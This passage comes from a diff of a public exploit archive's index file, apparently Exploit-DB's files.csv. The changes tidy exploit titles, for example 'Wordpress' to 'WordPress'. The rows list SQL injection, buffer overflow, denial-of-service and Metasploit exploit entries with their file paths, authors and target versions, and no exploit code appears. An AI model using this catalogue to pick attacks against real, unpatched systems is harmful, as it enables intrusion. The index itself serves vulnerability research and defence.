Injection",2011-02-16,R4dc0re,asp,webapps,0 16179,platforms/asp/webapps/16179.txt,"Rae Media Real Estate Multi Agent - SQL Injection",2011-02-16,R4dc0re,asp,webapps,0 16180,platforms/windows/dos/16180.py,"BWMeter 5.4.0 - '.csv' Denial of Service",2011-02-17,b0telh0,windows,dos,0 -16181,platforms/php/webapps/16181.txt,"Wordpress User Photo Component Plugin - Remote File Upload",2011-02-17,ADVtools,php,webapps,0 +16181,platforms/php/webapps/16181.txt,"WordPress User Photo Component Plugin - Remote File Upload",2011-02-17,ADVtools,php,webapps,0 16182,platforms/linux/dos/16182.txt,"PHP 5.3.5 - grapheme_extract() NULL Pointer Dereference",2011-02-17,"Maksymilian Arciemowicz",linux,dos,0 16193,platforms/windows/dos/16193.pl,"Avira AntiVir QUA file - (avcenter.exe) Local Crash (PoC)",2011-02-19,KedAns-Dz,windows,dos,0 16204,platforms/windows/dos/16204.pl,"Solar FTP 2.1 - Denial of Service",2011-02-22,x000,windows,dos,0 @@ -14021,7 +14022,7 @@ id,file,description,date,author,platform,type,port 16197,platforms/php/webapps/16197.txt,"Escort Directory CMS - SQL Injection",2011-02-19,NoNameMT,php,webapps,0 16198,platforms/php/webapps/16198.txt,"Independent Escort CMS - Blind SQL Injection",2011-02-19,NoNameMT,php,webapps,0 16199,platforms/php/webapps/16199.txt,"Icy Phoenix 1.3.0.53a - HTTP Referer Persistent Cross-Site Scripting",2011-02-20,"Saif El-Sherei",php,webapps,0 -16200,platforms/php/webapps/16200.py,"JAKCMS 2.01 - Code Execution Exploit",2011-02-20,mr_me,php,webapps,0 +16200,platforms/php/webapps/16200.py,"JAKCMS 2.01 - Code Execution",2011-02-20,mr_me,php,webapps,0 16201,platforms/php/webapps/16201.py,"JAKCMS 2.01 RC1 - Blind SQL Injection",2011-02-20,mr_me,php,webapps,0 16202,platforms/php/webapps/16202.txt,"Woltlab Burning Board 2.3.6 Addon - (hilfsmittel.php) SQL Injection",2011-02-21,Crazyball,php,webapps,0 16253,platforms/windows/local/16253.py,"Elecard AVC_HD/MPEG Player 5.7 - Buffer Overflow",2011-02-27,sickness,windows,local,0 @@ -14035,7 +14036,7 @@ id,file,description,date,author,platform,type,port 16222,platforms/php/webapps/16222.txt,"course registration management system 2.1 - Multiple Vulnerabilities",2011-02-23,"AutoSec Tools",php,webapps,0 16223,platforms/php/webapps/16223.txt,"VidiScript - SQL Injection",2011-02-23,ThEtA.Nu,php,webapps,0 16220,platforms/php/webapps/16220.py,"ProQuiz 2.0.0b - Arbitrary Upload",2011-02-23,"AutoSec Tools",php,webapps,0 -16218,platforms/php/webapps/16218.txt,"Z-Vote 1.1 Wordpress Plugin - SQL Injection",2011-02-23,"High-Tech Bridge SA",php,webapps,0 +16218,platforms/php/webapps/16218.txt,"Z-Vote 1.1 WordPress Plugin - SQL Injection",2011-02-23,"High-Tech Bridge SA",php,webapps,0 16213,platforms/php/webapps/16213.txt,"Hyena Cart - 'index.php' SQL Injection",2011-02-23,"AtT4CKxT3rR0r1ST ",php,webapps,0 16214,platforms/php/webapps/16214.txt,"tplSoccerStats - 'player.php' SQL Injection",2011-02-23,"AtT4CKxT3rR0r1ST ",php,webapps,0 16217,platforms/php/webapps/16217.txt,"bitweaver 2.8.1 - Persistent Cross-Site Scripting",2011-02-23,lemlajt,php,webapps,0 @@ -14044,11 +14045,11 @@ id,file,description,date,author,platform,type,port 16229,platforms/ios/remote/16229.txt,"iOS myDBLite 1.1.10 - Directory Traversal",2011-02-24,"R3d@l3rt, Sp@2K, Sunlight",ios,remote,0 16230,platforms/windows/dos/16230.py,"Victory FTP Server 5.0 - Denial of Service",2011-02-24,"C4SS!0 G0M3S",windows,dos,0 16231,platforms/ios/remote/16231.txt,"iOS Share 1.0 - Directory Traversal",2011-02-24,"R3d@l3rt, Sp@2K, Sunlight",ios,remote,0 -16232,platforms/php/webapps/16232.txt,"GigPress 2.1.10 Wordpress Plugin - Persistent Cross-Site Scripting",2011-02-24,"Saif El-Sherei",php,webapps,0 -16233,platforms/php/webapps/16233.txt,"Relevanssi 2.7.2 Wordpress Plugin - Persistent Cross-Site Scripting",2011-02-24,"Saif El-Sherei",php,webapps,0 +16232,platforms/php/webapps/16232.txt,"GigPress 2.1.10 WordPress Plugin - Persistent Cross-Site Scripting",2011-02-24,"Saif El-Sherei",php,webapps,0 +16233,platforms/php/webapps/16233.txt,"Relevanssi 2.7.2 WordPress Plugin - Persistent Cross-Site Scripting",2011-02-24,"Saif El-Sherei",php,webapps,0 16234,platforms/netware/dos/16234.rb,"Novell Netware - RPC XNFS xdrDecodeString",2011-02-24,"Francis Provencher",netware,dos,0 -16235,platforms/php/webapps/16235.txt,"Wordpress Plugin Forum Server 1.6.5 - SQL Injection",2011-02-24,"High-Tech Bridge SA",php,webapps,0 -16236,platforms/php/webapps/16236.txt,"IWantOneButton 3.0.1 Wordpress Plugin - Multiple Vulnerabilities",2011-02-24,"High-Tech Bridge SA",php,webapps,0 +16235,platforms/php/webapps/16235.txt,"WordPress Plugin Forum Server 1.6.5 - SQL Injection",2011-02-24,"High-Tech Bridge SA",php,webapps,0 +16236,platforms/php/webapps/16236.txt,"IWantOneButton 3.0.1 WordPress Plugin - Multiple Vulnerabilities",2011-02-24,"High-Tech Bridge SA",php,webapps,0 16237,platforms/windows/dos/16237.py,"Elecard MPEG Player 5.7 - Local Buffer Overflow PoC (SEH)",2011-02-24,badc0re,windows,dos,0 16238,platforms/hardware/remote/16238.txt,"iphone ishred 1.93 - Directory Traversal",2011-02-24,"Khashayar Fereidani",hardware,remote,0 16239,platforms/hardware/remote/16239.txt,"iPhone Guitar - Directory Traversal",2011-02-24,"Khashayar Fereidani",hardware,remote,0 @@ -14062,8 +14063,8 @@ id,file,description,date,author,platform,type,port 16247,platforms/php/webapps/16247.txt,"Pragyan CMS 3.0 - Multiple Vulnerabilities",2011-02-25,"Villy and Abhishek Lyall",php,webapps,0 16248,platforms/windows/dos/16248.pl,"eXPert PDF Reader 4.0 - NULL Pointer Dereference and Heap Corruption",2011-02-26,LiquidWorm,windows,dos,0 16249,platforms/php/webapps/16249.txt,"phreebooks r30rc4 - Multiple Vulnerabilities",2011-02-26,"AutoSec Tools",php,webapps,0 -16250,platforms/php/webapps/16250.txt,"jQuery Mega Menu 1.0 Wordpress Plugin - Local File Inclusion",2011-02-26,"AutoSec Tools",php,webapps,0 -16251,platforms/php/webapps/16251.txt,"OPS Old Post Spinner 2.2.1 Wordpress Plugin - Local File Inclusion",2011-02-26,"AutoSec Tools",php,webapps,0 +16250,platforms/php/webapps/16250.txt,"jQuery Mega Menu 1.0 WordPress Plugin - Local File Inclusion",2011-02-26,"AutoSec Tools",php,webapps,0 +16251,platforms/php/webapps/16251.txt,"OPS Old Post Spinner 2.2.1 WordPress Plugin - Local File Inclusion",2011-02-26,"AutoSec Tools",php,webapps,0 16252,platforms/hardware/webapps/16252.html,"Linksys Cisco WAG120N - Cross-Site Request Forgery",2011-02-26,"Khashayar Fereidani",hardware,webapps,0 16255,platforms/windows/dos/16255.pl,"Magic Music Editor - '.cda' Denial of Service",2011-02-28,"AtT4CKxT3rR0r1ST ",windows,dos,0 16256,platforms/php/webapps/16256.txt,"DO-CMS - Multiple SQL Injections",2011-02-28,"AtT4CKxT3rR0r1ST ",php,webapps,0 @@ -14079,13 +14080,13 @@ id,file,description,date,author,platform,type,port 16268,platforms/php/webapps/16268.pl,"cChatBox for vBulletin 3.6.8 / 3.7.x - SQL Injection",2011-03-02,DSecurity,php,webapps,0 16270,platforms/linux/dos/16270.c,"vsftpd 2.3.2 - Denial of Service",2011-03-02,"Maksymilian Arciemowicz",linux,dos,0 16271,platforms/ios/remote/16271.txt,"iOS TIOD 1.3.3 - Directory Traversal",2011-03-03,"R3d@l3rt, H@ckk3y",ios,remote,0 -16273,platforms/php/webapps/16273.php,"PHP Speedy 0.5.2 Wordpress Plugin - (admin_container.php) Remote Code Execution Exploit",2011-03-04,mr_me,php,webapps,0 +16273,platforms/php/webapps/16273.php,"PHP Speedy 0.5.2 WordPress Plugin - (admin_container.php) Remote Code Execution",2011-03-04,mr_me,php,webapps,0 16274,platforms/jsp/webapps/16274.pl,"JBoss Application Server 4.2 < 4.2.0.CP09 / 4.3 < 4.3.0.CP08 - Remote Exploit",2011-03-04,kingcope,jsp,webapps,0 16275,platforms/hardware/remote/16275.txt,"Comtrend ADSL Router CT-5367 C01_R12 - Remote Root",2011-03-04,"Todor Donev",hardware,remote,0 16276,platforms/php/webapps/16276.txt,"ADAN Neuronlabs - 'view.php' SQL Injection",2011-03-04,IRAQ_JAGUAR,php,webapps,0 16278,platforms/ios/remote/16278.py,"iOS iFileExplorer Free - Directory Traversal",2011-03-04,theSmallNothin,ios,remote,0 16279,platforms/php/webapps/16279.txt,"MySms 1.0 - Multiple Vulnerabilities",2011-03-05,"AtT4CKxT3rR0r1ST ",php,webapps,0 -16280,platforms/php/webapps/16280.py,"Vtiger CRM 5.0.4 - Pre-Authenticated Local File Inclusion Exploit",2011-03-05,TecR0c,php,webapps,0 +16280,platforms/php/webapps/16280.py,"Vtiger CRM 5.0.4 - Pre-Authentication Local File Inclusion",2011-03-05,TecR0c,php,webapps,0 16281,platforms/php/webapps/16281.txt,"BoutikOne - 'description.php' SQL Injection",2011-03-05,IRAQ_JAGUAR,php,webapps,0 16283,platforms/win_x86/shellcode/16283.txt,"Win32 - eggsearch Shellcode (33 bytes)",2011-03-05,oxff,win_x86,shellcode,0 16284,platforms/unix/dos/16284.rb,"Subversion - Date Svnserve",2010-08-07,Metasploit,unix,dos,0 @@ -14099,7 +14100,7 @@ id,file,description,date,author,platform,type,port 16293,platforms/multiple/remote/16293.rb,"Sun Java - Calendar Deserialization Exploit",2010-09-20,Metasploit,multiple,remote,0 16294,platforms/multiple/remote/16294.rb,"Sun Java JRE - getSoundbank file:// URI Buffer Overflow",2010-09-20,Metasploit,multiple,remote,0 16295,platforms/multiple/remote/16295.rb,"Apple QTJava - toQTPointer() Arbitrary Memory Access",2010-09-20,Metasploit,multiple,remote,0 -16296,platforms/osx/remote/16296.rb,"Apple OSX iTunes 8.1.1 - ITms Overflow",2010-11-11,Metasploit,osx,remote,0 +16296,platforms/osx/remote/16296.rb,"Apple Mac OS X iTunes 8.1.1 - ITms Overflow",2010-11-11,Metasploit,osx,remote,0 16297,platforms/multiple/remote/16297.rb,"Java - Statement.invoke() Trusted Method Chain Exploit",2010-12-15,Metasploit,multiple,remote,0 16298,platforms/multiple/remote/16298.rb,"Sun Java - JRE AWT setDiffICM Buffer Overflow",2010-09-20,Metasploit,multiple,remote,0 16299,platforms/multiple/remote/16299.rb,"Firefox 3.5 - escape() Return Value Memory Corruption",2010-09-20,Metasploit,multiple,remote,0 @@ -14113,13 +14114,13 @@ id,file,description,date,author,platform,type,port 16307,platforms/multiple/local/16307.rb,"PeaZip 2.6.1 - Zip Processing Command Injection",2010-09-20,Metasploit,multiple,local,0 16308,platforms/multiple/remote/16308.rb,"Maple Maplet - File Creation / Command Execution",2010-09-20,Metasploit,multiple,remote,0 16309,platforms/multiple/remote/16309.rb,"Adobe - U3D CLODProgressiveMeshDeclaration Array Overrun (1)",2010-09-20,Metasploit,multiple,remote,0 -16310,platforms/multiple/remote/16310.rb,"PHP 4 - unserialize() ZVAL Reference Counter Overflow (Cookie)",2010-09-20,Metasploit,multiple,remote,0 -16311,platforms/linux/remote/16311.rb,"WU-FTPD - SITE EXEC/INDEX Format String",2010-11-30,Metasploit,linux,remote,0 +16310,platforms/multiple/remote/16310.rb,"PHP 4 - Unserialize() ZVAL Reference Counter Overflow (Cookie)",2010-09-20,Metasploit,multiple,remote,0 +16311,platforms/linux/remote/16311.rb,"WU-FTPD - Site EXEC/INDEX Format String",2010-11-30,Metasploit,linux,remote,0 16312,platforms/multiple/remote/16312.rb,"Axis2 - Authenticated Code Execution (via REST)",2010-12-14,Metasploit,multiple,remote,0 16313,platforms/php/webapps/16313.rb,"FreeNAS - exec_raw.php Arbitrary Command Execution",2010-11-24,Metasploit,php,webapps,0 16314,platforms/multiple/remote/16314.rb,"Sun Java - System Web Server WebDAV OPTIONS Buffer Overflow",2010-08-07,Metasploit,multiple,remote,0 16315,platforms/multiple/remote/16315.rb,"Axis2 - / SAP BusinessObjects Authenticated Code Execution (via SOAP)",2010-12-14,Metasploit,multiple,remote,0 -16316,platforms/multiple/remote/16316.rb,"JBoss - Java Class DeploymentFileRepository WAR deployment",2010-08-03,Metasploit,multiple,remote,0 +16316,platforms/multiple/remote/16316.rb,"JBoss - Java Class DeploymentFileRepository WAR Deployment",2010-08-03,Metasploit,multiple,remote,0 16317,platforms/multiple/remote/16317.rb,"Apache Tomcat Manager Application Deployer - Authenticated Code Execution",2010-12-14,Metasploit,multiple,remote,0 16318,platforms/multiple/remote/16318.rb,"JBoss JMX - Console Deployer Upload and Execute",2010-10-19,Metasploit,multiple,remote,0 16319,platforms/multiple/remote/16319.rb,"JBoss JMX - Console Beanshell Deployer WAR Upload and Deployment",2011-01-10,Metasploit,multiple,remote,0 @@ -14132,18 +14133,18 @@ id,file,description,date,author,platform,type,port 16326,platforms/solaris/remote/16326.rb,"Solaris - ypupdated Command Execution",2010-07-25,Metasploit,solaris,remote,0 16327,platforms/solaris/remote/16327.rb,"Solaris in.TelnetD - TTYPROMPT Buffer Overflow",2010-06-22,Metasploit,solaris,remote,0 16328,platforms/solaris/remote/16328.rb,"Sun Solaris - Telnet Remote Authentication Bypass",2010-06-22,Metasploit,solaris,remote,0 -16329,platforms/solaris/remote/16329.rb,"Samba - lsa_io_trans_names Heap Overflow (Solaris)",2010-04-05,Metasploit,solaris,remote,0 +16329,platforms/solaris/remote/16329.rb,"Samba (Solaris) - lsa_io_trans_names Heap Overflow",2010-04-05,Metasploit,solaris,remote,0 16330,platforms/solaris_sparc/remote/16330.rb,"Samba (Solaris SPARC) - trans2open Overflow",2010-06-21,Metasploit,solaris_sparc,remote,0 16331,platforms/windows/remote/16331.rb,"Veritas Backup Exec Name Service - Overflow Exploit",2010-06-22,Metasploit,windows,remote,0 16332,platforms/windows/remote/16332.rb,"Veritas Backup Exec Windows - Remote Agent Overflow",2010-07-03,Metasploit,windows,remote,0 -16333,platforms/windows/remote/16333.rb,"Windows Media Services - ConnectFunnel Stack Buffer Overflow",2010-04-28,Metasploit,windows,remote,0 +16333,platforms/windows/remote/16333.rb,"Microsoft Windows Media Services - ConnectFunnel Stack Buffer Overflow",2010-04-28,Metasploit,windows,remote,0 16334,platforms/windows/remote/16334.rb,"Microsoft Private Communications Transport - Overflow Exploit",2010-09-20,Metasploit,windows,remote,0 16335,platforms/windows/remote/16335.rb,"WinComLPD 3.0.2 - Buffer Overflow",2010-06-22,Metasploit,windows,remote,0 16336,platforms/windows/remote/16336.rb,"NIPrint LPD - Request Overflow",2010-12-25,Metasploit,windows,remote,0 16337,platforms/windows/remote/16337.rb,"Hummingbird Connectivity 10 SP5 - LPD Buffer Overflow",2010-09-20,Metasploit,windows,remote,0 16338,platforms/windows/remote/16338.rb,"SAP SAPLPD 6.28 - Buffer Overflow",2010-05-09,Metasploit,windows,remote,0 16339,platforms/windows/remote/16339.rb,"Timbuktu Pro - Directory Traversal / File Upload",2010-11-24,Metasploit,windows,remote,0 -16340,platforms/windows/remote/16340.rb,"Oracle 8i TNS Listener - (ARGUMENTS) Buffer Overflow",2010-11-24,Metasploit,windows,remote,0 +16340,platforms/windows/remote/16340.rb,"Oracle 8i TNS Listener - 'ARGUMENTS' Buffer Overflow",2010-11-24,Metasploit,windows,remote,0 16341,platforms/windows/remote/16341.rb,"Oracle 8i - TNS Listener SERVICE_NAME Buffer Overflow",2010-11-24,Metasploit,windows,remote,0 16342,platforms/windows/remote/16342.rb,"Oracle 10gR2 - TNS Listener AUTH_SESSKEY Buffer Overflow",2010-11-24,Metasploit,windows,remote,0 16343,platforms/windows/remote/16343.rb,"Oracle Secure Backup - NDMP_CONNECT_CLIENT_AUTH Buffer Overflow",2010-05-09,Metasploit,windows,remote,0 @@ -14166,22 +14167,22 @@ id,file,description,date,author,platform,type,port 16360,platforms/windows/remote/16360.rb,"Microsoft Windows - SMB Relay Code Execution",2010-09-21,Metasploit,windows,remote,0 16361,platforms/windows/remote/16361.rb,"Microsoft Windows - Print Spooler Service Impersonation (MS10-061)",2011-02-17,Metasploit,windows,remote,0 16362,platforms/windows/remote/16362.rb,"Microsoft Windows Server - Service Relative Path Stack Corruption (MS08-067)",2011-01-21,Metasploit,windows,remote,0 -16363,platforms/windows/remote/16363.rb,"Microsoft Windows - SRV2.SYS SMB Negotiate ProcessID Function Table Dereference",2010-07-03,Metasploit,windows,remote,0 +16363,platforms/windows/remote/16363.rb,"Microsoft Windows - 'srv2.sys' SMB Negotiate ProcessID Function Table Dereference",2010-07-03,Metasploit,windows,remote,0 16364,platforms/windows/remote/16364.rb,"Microsoft RRAS Service - Overflow Exploit",2010-05-09,Metasploit,windows,remote,0 16365,platforms/windows/dos/16365.rb,"Microsoft Plug and Play Service - Overflow Exploit",2010-08-30,Metasploit,windows,dos,0 -16366,platforms/windows/remote/16366.rb,"Microsoft DNS RPC Service - extractQuotedChar() Overflow (SMB)",2010-09-28,Metasploit,windows,remote,0 +16366,platforms/windows/remote/16366.rb,"Microsoft DNS RPC Service - extractQuotedChar() Overflow 'SMB'",2010-09-28,Metasploit,windows,remote,0 16367,platforms/windows/remote/16367.rb,"Microsoft Server Service - NetpwPathCanonicalize Overflow",2011-02-17,Metasploit,windows,remote,0 16368,platforms/windows/remote/16368.rb,"Microsoft LSASS Service - DsRolerUpgradeDownlevelServer Overflow",2010-07-03,Metasploit,windows,remote,0 16369,platforms/windows/remote/16369.rb,"Microsoft Services - nwwks.dll (MS06-066)",2010-05-09,Metasploit,windows,remote,0 16370,platforms/windows/remote/16370.rb,"Timbuktu 8.6.6 - PlughNTCommand Named Pipe Buffer Overflow",2010-04-30,Metasploit,windows,remote,0 16371,platforms/windows/remote/16371.rb,"Microsoft NetDDE Service - Overflow Exploit",2010-07-03,Metasploit,windows,remote,0 -16372,platforms/windows/remote/16372.rb,"Microsoft - Workstation Service NetpManageIPCConnect Overflow",2010-10-05,Metasploit,windows,remote,0 +16372,platforms/windows/remote/16372.rb,"Microsoft Workstation Service - NetpManageIPCConnect Overflow",2010-10-05,Metasploit,windows,remote,0 16373,platforms/windows/remote/16373.rb,"Microsoft Services - nwapi32.dll (MS06-066)",2010-08-25,Metasploit,windows,remote,0 16374,platforms/windows/remote/16374.rb,"Microsoft Windows - Authenticated User Code Execution",2010-12-02,Metasploit,windows,remote,0 16375,platforms/windows/remote/16375.rb,"Microsoft RRAS Service - RASMAN Registry Overflow",2010-08-25,Metasploit,windows,remote,0 16376,platforms/windows/remote/16376.rb,"Novell NetIdentity Agent - XTIERRPCPIPE Named Pipe Buffer Overflow",2010-11-24,Metasploit,windows,remote,0 16377,platforms/windows/remote/16377.rb,"Microsoft Windows - ASN.1 Library Bitstring Heap Overflow (MS04-007)",2010-07-25,Metasploit,windows,remote,0 -16378,platforms/windows/remote/16378.rb,"Microsoft - Workstation Service NetAddAlternateComputerName Overflow",2010-05-09,Metasploit,windows,remote,0 +16378,platforms/windows/remote/16378.rb,"Microsoft Workstation Service - NetAddAlternateComputerName Overflow",2010-05-09,Metasploit,windows,remote,0 16379,platforms/windows/remote/16379.rb,"Microsoft Outlook Express - NNTP Response Parsing Buffer Overflow",2010-05-09,Metasploit,windows,remote,0 16380,platforms/windows/remote/16380.rb,"CitectSCADA/CitectFacilities ODBC - Buffer Overflow",2010-11-14,Metasploit,windows,remote,0 16381,platforms/windows/remote/16381.rb,"MOXA Device Manager Tool 2.1 - Buffer Overflow",2010-11-14,Metasploit,windows,remote,0 @@ -14199,7 +14200,7 @@ id,file,description,date,author,platform,type,port 16393,platforms/windows/remote/16393.rb,"Microsoft SQL Server - Resolution Overflow",2010-04-30,Metasploit,windows,remote,0 16394,platforms/windows/remote/16394.rb,"Microsoft SQL Server - Payload Execution (via SQL Injection)",2011-02-08,Metasploit,windows,remote,0 16395,platforms/windows/remote/16395.rb,"Microsoft SQL Server - Payload Execution",2010-12-21,Metasploit,windows,remote,0 -16396,platforms/windows/remote/16396.rb,"Microsoft SQL Server - sp_replwritetovarbin Memory Corruption via SQL Injection",2011-02-08,Metasploit,windows,remote,0 +16396,platforms/windows/remote/16396.rb,"Microsoft SQL Server - sp_replwritetovarbin Memory Corruption (via SQL Injection)",2011-02-08,Metasploit,windows,remote,0 16397,platforms/windows/remote/16397.rb,"Lyris ListManager - MSDE Weak sa Password",2010-09-20,Metasploit,windows,remote,0 16398,platforms/windows/remote/16398.rb,"Microsoft SQL Server - Hello Overflow",2010-04-30,Metasploit,windows,remote,0 16399,platforms/windows/remote/16399.rb,"Seattle Lab Mail (SLMail) 5.5 - POP3 Buffer Overflow",2010-04-30,Metasploit,windows,remote,0 @@ -14230,7 +14231,7 @@ id,file,description,date,author,platform,type,port 16424,platforms/windows/remote/16424.rb,"Apple QuickTime 7.3 - RTSP Response Header Buffer Overflow",2010-05-09,Metasploit,windows,remote,0 16425,platforms/windows/remote/16425.rb,"Asus Dpcproxy - Buffer Overflow",2010-06-22,Metasploit,windows,remote,0 16426,platforms/windows/remote/16426.rb,"BigAnt Server 2.52 - USV Buffer Overflow",2010-05-09,Metasploit,windows,remote,0 -16427,platforms/windows/remote/16427.rb,"Windows RSH daemon - Buffer Overflow",2010-04-30,Metasploit,windows,remote,0 +16427,platforms/windows/remote/16427.rb,"Microsoft Windows RSH daemon - Buffer Overflow",2010-04-30,Metasploit,windows,remote,0 16428,platforms/windows/remote/16428.rb,"IBM Tivoli Storage Manager Express RCA Service - Buffer Overflow",2010-05-09,Metasploit,windows,remote,0 16429,platforms/windows/remote/16429.rb,"HP OpenView - Operations OVTrace Buffer Overflow",2010-06-22,Metasploit,windows,remote,0 16430,platforms/windows/remote/16430.rb,"BigAnt Server 2.2 - Buffer Overflow",2010-05-09,Metasploit,windows,remote,0 @@ -14240,7 +14241,7 @@ id,file,description,date,author,platform,type,port 16434,platforms/windows/remote/16434.rb,"Borland CaliberRM - StarTeam Multicast Service Buffer Overflow",2010-06-15,Metasploit,windows,remote,0 16435,platforms/windows/remote/16435.rb,"HP - OmniInet.exe MSG_PROTOCOL Buffer Overflow (1)",2010-09-20,Metasploit,windows,remote,0 16436,platforms/windows/remote/16436.rb,"Netcat 1.10 - NT Stack Buffer Overflow",2010-06-22,Metasploit,windows,remote,0 -16437,platforms/windows/remote/16437.rb,"Borland InterBase - isc_create_database() Buffer Overflow",2010-07-03,Metasploit,windows,remote,0 +16437,platforms/windows/remote/16437.rb,"Borland Interbase - isc_create_database() Buffer Overflow",2010-07-03,Metasploit,windows,remote,0 16438,platforms/windows/remote/16438.rb,"eIQNetworks ESA - Topology DELETEDEVICE Overflow",2010-09-20,Metasploit,windows,remote,0 16439,platforms/windows/remote/16439.rb,"NetTransport Download Manager 2.90.510 - Buffer Overflow",2010-08-25,Metasploit,windows,remote,0 16440,platforms/windows/remote/16440.rb,"Firebird Relational Database - isc_attach_database() Buffer Overflow",2010-07-03,Metasploit,windows,remote,0 @@ -14250,9 +14251,9 @@ id,file,description,date,author,platform,type,port 16444,platforms/windows/remote/16444.rb,"TinyIdentD 2.2 - Stack Buffer Overflow",2010-09-20,Metasploit,windows,remote,0 16445,platforms/windows/remote/16445.rb,"Bopup Communications Server - Buffer Overflow",2010-05-09,Metasploit,windows,remote,0 16446,platforms/windows/remote/16446.rb,"UFO: Alien Invasion IRC Client (Windows) - Buffer Overflow",2010-10-09,Metasploit,windows,remote,0 -16447,platforms/windows/remote/16447.rb,"Borland InterBase - isc_attach_database() Buffer Overflow",2010-07-03,Metasploit,windows,remote,0 +16447,platforms/windows/remote/16447.rb,"Borland Interbase - isc_attach_database() Buffer Overflow",2010-07-03,Metasploit,windows,remote,0 16448,platforms/windows/remote/16448.rb,"BakBone NetVault - Remote Heap Overflow",2010-09-20,Metasploit,windows,remote,0 -16449,platforms/windows/remote/16449.rb,"Borland InterBase - SVC_attach() Buffer Overflow",2010-07-03,Metasploit,windows,remote,0 +16449,platforms/windows/remote/16449.rb,"Borland Interbase - SVC_attach() Buffer Overflow",2010-07-03,Metasploit,windows,remote,0 16450,platforms/windows/remote/16450.rb,"DoubleTake/HP StorageWorks Storage Mirroring Service - Authentication Overflow",2010-07-03,Metasploit,windows,remote,0 16451,platforms/windows/remote/16451.rb,"eIQNetworks ESA - License Manager LICMGR_ADDLICENSE Overflow",2010-09-20,Metasploit,windows,remote,0 16452,platforms/windows/remote/16452.rb,"AgentX++ Master - AgentX::receive_agentx Stack Buffer Overflow",2010-05-11,Metasploit,windows,remote,0 @@ -14273,7 +14274,7 @@ id,file,description,date,author,platform,type,port 16467,platforms/windows/remote/16467.rb,"Microsoft IIS/PWS - CGI Filename Double Decode Command Execution",2011-01-08,Metasploit,windows,remote,0 16468,platforms/windows/remote/16468.rb,"Microsoft IIS 4.0 - '.htr' Path Overflow",2010-04-30,Metasploit,windows,remote,0 16469,platforms/windows/remote/16469.rb,"Microsoft IIS 5.0 - Printer Host Header Overflow",2010-04-30,Metasploit,windows,remote,0 -16470,platforms/windows/remote/16470.rb,"Microsoft Windows IIS 5.0 WebDAV - ntdll.dll Path Overflow",2010-07-25,Metasploit,windows,remote,0 +16470,platforms/windows/remote/16470.rb,"Microsoft IIS 5.0 - WebDAV ntdll.dll Path Overflow",2010-07-25,Metasploit,windows,remote,0 16471,platforms/windows/remote/16471.rb,"Microsoft IIS - WebDAV Write Access Code Execution",2010-09-20,Metasploit,windows,remote,0 16472,platforms/windows/remote/16472.rb,"Microsoft IIS 5.0 - IDQ Path Overflow",2010-06-15,Metasploit,windows,remote,0 16473,platforms/windows/remote/16473.rb,"Mercury/32 <= 4.01b - LOGIN Buffer Overflow",2010-06-22,Metasploit,windows,remote,0 @@ -14281,7 +14282,7 @@ id,file,description,date,author,platform,type,port 16475,platforms/windows/remote/16475.rb,"MailEnable IMAPD (2.35) - Login Request Buffer Overflow",2010-04-30,Metasploit,windows,remote,0 16476,platforms/windows/remote/16476.rb,"Mercur 5.0 - IMAP SP3 SELECT Buffer Overflow",2010-09-20,Metasploit,windows,remote,0 16477,platforms/windows/remote/16477.rb,"Mdaemon 8.0.3 - IMAPD CRAM-MD5 Authentication Overflow",2010-06-22,Metasploit,windows,remote,0 -16478,platforms/windows/remote/16478.rb,"Novell NetMail 3.52d - IMAP SUBSCRIBE Buffer Overflow",2010-05-09,Metasploit,windows,remote,0 +16478,platforms/windows/remote/16478.rb,"Novell NetMail 3.52d - IMAP Subscribe Buffer Overflow",2010-05-09,Metasploit,windows,remote,0 16479,platforms/windows/remote/16479.rb,"IMail IMAP4D - Delete Overflow",2010-09-20,Metasploit,windows,remote,0 16480,platforms/windows/remote/16480.rb,"MailEnable - IMAPD W3C Logging Buffer Overflow",2010-06-15,Metasploit,windows,remote,0 16481,platforms/windows/remote/16481.rb,"Mercur Messaging 2005 - IMAP Login Buffer Overflow",2010-08-25,Metasploit,windows,remote,0 @@ -14289,7 +14290,7 @@ id,file,description,date,author,platform,type,port 16483,platforms/windows/remote/16483.rb,"Novell NetMail 3.52d - IMAP STATUS Buffer Overflow",2010-05-09,Metasploit,windows,remote,0 16484,platforms/windows/remote/16484.rb,"Mercury/32 4.01a - IMAP RENAME Buffer Overflow",2010-05-09,Metasploit,windows,remote,0 16485,platforms/windows/remote/16485.rb,"MailEnable IMAPD 1.54 - STATUS Request Buffer Overflow",2010-04-30,Metasploit,windows,remote,0 -16486,platforms/windows/remote/16486.rb,"Novell NetMail 3.52d - IMAP AUTHENTICATE Buffer Overflow",2010-05-09,Metasploit,windows,remote,0 +16486,platforms/windows/remote/16486.rb,"Novell NetMail 3.52d - IMAP Authenticate Buffer Overflow",2010-05-09,Metasploit,windows,remote,0 16487,platforms/windows/remote/16487.rb,"Ipswitch IMail - IMAP SEARCH Buffer Overflow",2010-06-15,Metasploit,windows,remote,0 16488,platforms/windows/remote/16488.rb,"Novell NetMail 3.52d - IMAP APPEND Buffer Overflow",2010-05-09,Metasploit,windows,remote,0 16489,platforms/windows/remote/16489.rb,"RealVNC 3.3.7 - Client Buffer Overflow",2010-04-30,Metasploit,windows,remote,0 @@ -14298,7 +14299,7 @@ id,file,description,date,author,platform,type,port 16492,platforms/windows/remote/16492.rb,"Novell iPrint Client - ActiveX Control ExecuteRequest debug Buffer Overflow",2010-09-21,Metasploit,windows,remote,0 16493,platforms/windows/remote/16493.rb,"EnjoySAP SAP GUI - ActiveX Control Arbitrary File Download",2010-12-01,Metasploit,windows,remote,0 16494,platforms/windows/remote/16494.rb,"Adobe CoolType - SING Table 'uniqueName' Stack Buffer Overflow (1)",2010-09-20,Metasploit,windows,remote,0 -16495,platforms/multiple/remote/16495.rb,"Sun Java Web Start BasicServiceImpl - Remote Code Execution Exploit",2011-01-22,Metasploit,multiple,remote,0 +16495,platforms/multiple/remote/16495.rb,"Sun Java Web Start BasicServiceImpl - Remote Code Execution",2011-01-22,Metasploit,multiple,remote,0 16496,platforms/windows/remote/16496.rb,"Kazaa Altnet Download Manager - ActiveX Control Buffer Overflow",2010-05-09,Metasploit,windows,remote,0 16497,platforms/windows/remote/16497.rb,"RealPlayer - ierpplug.dll ActiveX Control Playlist Name Buffer Overflow",2010-05-09,Metasploit,windows,remote,0 16498,platforms/windows/remote/16498.rb,"EnjoySAP SAP GUI - ActiveX Control Buffer Overflow",2010-06-15,Metasploit,windows,remote,0 @@ -14324,12 +14325,12 @@ id,file,description,date,author,platform,type,port 16518,platforms/windows/remote/16518.rb,"Chilkat Crypt - ActiveX WriteFile Unsafe Method",2010-09-20,Metasploit,windows,remote,0 